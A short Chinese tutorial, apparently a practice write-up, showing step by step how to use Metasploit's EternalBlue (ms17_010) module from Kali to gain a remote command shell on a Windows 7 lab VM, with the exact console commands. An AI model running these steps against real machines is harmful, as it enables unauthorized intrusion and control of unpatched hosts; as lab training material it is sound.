1.准备项目:
装有kali linux的虚拟机
win7靶机
2.查看一下kali和win7的ip:
kali的IP为:192.168.164.129
win7靶机的ip为:192.168.164.187
3.将kali切换成root模式:
4.用kali去ping一下win7靶机:
如果ping不动,就要在win7里关掉防火墙(省略)
5.启动Metasploit专用的数据库:
msfconsole
拖到最后会出现这样的字眼:
6.寻找永恒之蓝漏洞代号:ms17_010
search ms17_010
7.使用第0个攻击模块:
use 0
8.查看当前模块所需要配置的参数:
options
9.设置rhosts参数为win7靶机的ip:
set rhosts 192.168.164.187
再输入options查看:
10.LHOST填的是kali主机的ip,默认是填好了的:
11.最后跑一下攻击模块:
输入run,出现以下字眼表示入侵成功:
12.获取win7靶机的shell:
输入shell进入win7靶机的cmd状态:
出现乱码可以输入chcp 65001:
最后可以以cmd的命令方式操作win7靶机等,参考百度! 渗透练习结束!!!